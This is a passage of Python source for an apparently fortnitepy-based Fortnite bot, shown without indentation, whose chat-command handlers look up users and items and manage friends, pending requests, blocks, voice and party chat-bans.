await reply(message, client, l('set_to', l('privacy'), l(privacy.replace("privacy_","",1))))
break
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['privacy']}] [[{commands['privacy_public']}] / [{commands['privacy_friends_allow_friends_of_friends']}] / [{commands['privacy_friends']}] / [{commands['privacy_private_allow_friends_of_friends']}] / [{commands['privacy_private']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getuser']:
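# getuser/getfriend/getpending/getblock share one flow: match cached display names
# (kana-normalised and lower-cased when caseinsensitive), merge an exact fetch_user hit,
# then print one line per result.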
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getuser']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id}
try:
user = await client.fetch_user(rawcontent)
if user:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
text += f'\n{name(user)}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
friend = client.get_friend(user.id)
if not friend:
return
if not friend.nickname:
text += f'\n{str(friend.display_name)} / {friend.id}'
else:
text += f'\n{friend.nickname}({str(friend.display_name)}) / {friend.id}'
if friend.last_presence and friend.last_presence.avatar:
text += f"\n{l('avatar')}: {friend.last_presence.avatar.asset}"
if friend.last_logout:
text += "\n{1}: {0.year}/{0.month}/{0.day} {0.hour}:{0.minute}:{0.second}".format(friend.last_logout, l('lastlogin'))
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getpending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getpending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
pending = client.get_pending_friend(user.id)
if not pending:
return
text += f'\n{str(pending.display_name)} / {pending.id}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getblock']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getblock']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
block = client.get_blocked_user(user.id)
if not block:
return
text += f'\n{str(block.display_name)} / {block.id}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['info']:
try:
if args[1] in commands['info_party']:
text = str()
text += f"{client.party.id}\n{l('member_count')}: {client.party.member_count}\n{client.party.playlist_info[0]}"
for member in client.party.members:
client.add_cache(member)
if data['loglevel'] == 'normal':
text += f'\n{str(member.display_name)}'
else:
text += f'\n{str(member.display_name)} / {member.id}'
send(display_name,text)
await reply(message, client, text)
if data['loglevel'] == 'debug':
send(display_name,json.dumps(client.party.meta.schema,indent=4),yellow,add_d=lambda x:f'```\n{x}\n```')
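# Item lookup: search_item runs in an executor, matching by "id" here and by "name" in
# the next branch, first in search-lang and then in sub-search-lang as a fallback.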
elif any(args[1] in commands[key] for key in ("cid", "bid", "petcarrier", "pickaxe_id", "eid", "emoji_id", "toy_id", "id")):
type_ = convert_to_type(args[1])
if rawcontent2 == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [ID]")
return
result = await loop.run_in_executor(None, search_item, data["search-lang"], "id", rawcontent2, type_)
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "id", rawcontent2, type_)
if not result:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
await reply(message, client, f"{convert_backend_type(result[0]['backendType'])}: {result[0]['name']} | {result[0]['id']}\n{result[0]['description']}\n{result[0]['rarity']}\n{result[0]['set']}")
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_show_info')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
await reply(message, client, f"{convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}\n{item['description']}\n{item['rarity']}\n{item['set']}")""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
elif any(args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe", "emote", "emoji", "toy", "item")):
type_ = convert_to_type(args[1])
if rawcontent2 == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [{l('itemname')}]")
return
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", rawcontent2, type_)
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", rawcontent2, type_)
if not result:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
await reply(message, client, f"{convert_backend_type(result[0]['backendType'])}: {result[0]['name']} | {result[0]['id']}\n{result[0]['description']}\n{result[0]['rarity']}\n{result[0]['set']}")
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_show_info')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
await reply(message, client, f"{convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}\n{item['description']}\n{item['rarity']}\n{item['set']}")""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['info']}] [[{commands['info_party']}] / [{commands['item']}] / [{commands['id']}] / [{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}] / [{commands['emote']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pending']:
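# pending: bulk-accept (true) or bulk-decline (false) every incoming friend request.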
try:
pendings = []
for pending in client.pending_friends:
client.add_cache(pending)
if pending.incoming:
pendings.append(pending)
if args[1] in commands['true']:
for pending in pendings:
try:
await pending.accept()
await reply(message, client, l('add_friend', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
elif args[1] in commands['false']:
for pending in pendings:
try:
await pending.decline()
await reply(message, client, l('friend_request_decline', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['pending']}] [[{commands['true']}] / [{commands['false']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removepending']:
try:
pendings = []
for pending in client.pending_friends:
client.add_cache(pending)
if pending.outgoing:
pendings.append(pending)
for pending in pendings:
try:
await pending.cancel()
await reply(message, client, l('remove_pending', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and not client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and not client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if not client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if client.has_friend(user.id):
await reply(message, client, l('already_friend'))
return
await client.add_friend(user.id)
await reply(message, client, l('friend_request_to', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if client.has_friend(user.id):
await reply(message, client, l('already_friend'))
return
await client.add_friend(user.id)
await reply(message, client, l('friend_request_to', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_send_friendrequest')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removefriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removefriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.has_friend(user.id):
await reply(message, client, l('not_friend_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('remove_friend', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.has_friend(user.id):
await reply(message, client, l('not_friend_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('remove_friend', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_friend')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeallfriend']:
try:
friend_count = len(client.friends)
await client.remove_all_friends()
await reply(message, client, l('remove_allfriend',friend_count))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['remove_offline_for']:
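# Remove every friend whose last logout is older than the given
# days/hours/minutes. Up to five removals run concurrently; when Epic
# throttles a request, all workers pause until the cooldown passes.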
try:
kwargs = {}
kwargs["days"] = int(args[1])
kwargs["hours"] = int(args[2]) if args[2:3] else 0
kwargs["minutes"] = int(args[3]) if args[3:4] else 0
offline_for = datetime.timedelta(**kwargs)
utcnow = datetime.datetime.utcnow()
event = asyncio.Event(loop=loop)
removed = []
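# Worker coroutine: resolve the friend's last logout (from cache, or
# fetched for friendships made after boot), remove them when offline
# longer than offline_for, and honour the shared throttle event.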
async def _(friend: fortnitepy.Friend):
last_logout = None
if friend.last_logout:
last_logout = friend.last_logout
elif friend.created_at > client.booted_utc:
last_logout = await friend.fetch_last_logout()
if last_logout and ((utcnow - last_logout) > offline_for):
if event.is_set():
await event.wait()
try:
await friend.remove()
except fortnitepy.HTTPException as e:
if e.message_code != "errors.com.epicgames.common.throttled":
raise
if "Operation access is limited by throttling policy" not in e.message:
raise
event.set()
await asyncio.sleep(int(e.message_vars[0]) + 1)
await friend.remove()
event.clear()
removed.append(friend)
max_worker = 5
worker = 0
def dec(*args):
nonlocal worker
worker -= 1
tasks = []
val = len(client.friends)
for num,friend in enumerate(client.friends):
if worker >= max_worker:
await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
worker += 1
task = loop.create_task(_(friend))
task.add_done_callback(dec)
tasks.append(task)
await asyncio.gather(*tasks)
await reply(message, client, l('remove_allfriend',len(removed)))
await asyncio.sleep(2)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['remove_offline_for']}] [{l('day')}] [{l('hour')}]({l('optional')}) [{l('minute')}]({l('optional')})")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['acceptpending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['acceptpending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.accept_friend(user.id)
await reply(message, client, l('friend_add', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.accept_friend(user.id)
await reply(message, client, l('friend_add', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_accepting_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_accept_pending')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_accepting_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['declinepending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['declinepending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('friend_request_decline', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('friend_request_decline', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_decline_pending')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blockfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['blockfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and not client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and not client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if not client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if client.is_blocked(user.id):
await reply(message, client, l('already_block'))
return
await client.block_user(user.id)
await reply(message, client, l('block_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if client.is_blocked(user.id):
await reply(message, client, l('already_block'))
return
await client.block_user(user.id)
await reply(message, client, l('block_user', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_blocking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_block_user')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_blocking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unblockfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['unblockfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_blocked(user.id):
await reply(message, client, l('not_block'))
return
await client.unblock_user(user.id)
await reply(message, client, l('unblock_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_blocked(user.id):
await reply(message, client, l('not_block'))
return
await client.unblock_user(user.id)
await reply(message, client, l('unblock_user', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_unblocking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_unblock_user')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_unblocking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['voice']:
try:
if args[1] in commands['true']:
client.voice = True
await client.enable_voice()
send(display_name,l('set_to', 'voice', l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', 'voice', l('on')))
elif args[1] in commands['false']:
client.voice = False
await client.disable_voice()
send(display_name,l('set_to', 'voice', l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', 'voice', l('off')))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}]]")
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
elif args[0] in commands['chatban']:
try:
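# An optional ban reason may follow the name, separated by ' : '.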
reason = rawcontent.split(' : ')
if rawcontent == '':
await reply(message, client, f"[{commands['chatban']}] [{l('name_or_id')}] : [{l('reason')}({l('optional')})]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
try:
await member.chatban(reason[1])
except IndexError:
await member.chatban()
await reply(message, client, l('chatban_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
try:
await member.chatban(reason[1])
except IndexError:
await member.chatban()
await reply(message, client, l('chatban_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_chatban'))""" for user in users.values()
],
"variable": [
{"user": user, "reason": reason} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_chatban')}"
await reply(message, client, text)
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_chatban'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['promote']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['promote']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
